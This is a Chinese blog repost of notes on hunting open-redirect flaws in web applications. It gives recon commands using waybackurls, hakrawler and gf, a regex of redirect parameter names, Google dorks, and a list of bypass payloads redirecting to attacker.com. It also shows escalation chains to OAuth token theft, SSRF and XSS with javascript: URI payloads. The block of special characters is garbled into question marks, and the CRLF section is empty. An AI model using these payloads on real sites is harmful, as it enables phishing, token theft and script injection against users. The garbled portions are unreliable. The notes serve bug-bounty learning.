url跳转挖掘

https://0x00sec.org/t/open-redirection-guide/21118

工具都是go语言的,不太会用,留个坑

Identifing possible vulnerable endpoints:

  • waybackurls 10 + hakrawler 9 + gf 11

    1cat subdomains | waybackurls | tee -a urls
    2cat subdomains | hakrawler -depth 3 -plain | tee -a urls
    3gf redirect urls

    using redirect.json with gf:

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
}
  • Google dorks
    site:domain.com inurl:[PARAMETER] using a parameter list 21
  • Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit:

* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://company.com@attacker.com
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://????????.???

Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ? ? ? ? ? ? ? ? ? ? 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 。

Special characters’ source 4

Escalating to other vulnerabilities:

Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source 4

Escalate to XSS

  • https://company.com/?redirect=javascript:alert(1)
  • https://company.com/?redirect=javascript:prompt(1)

Escalate to XSS using CRLFi

url跳转挖掘

上一篇:python的append insert extend pop del remove使用


下一篇:Android在开发中的使用技巧之解决ScrollView嵌套RecyclerView出现的系列问题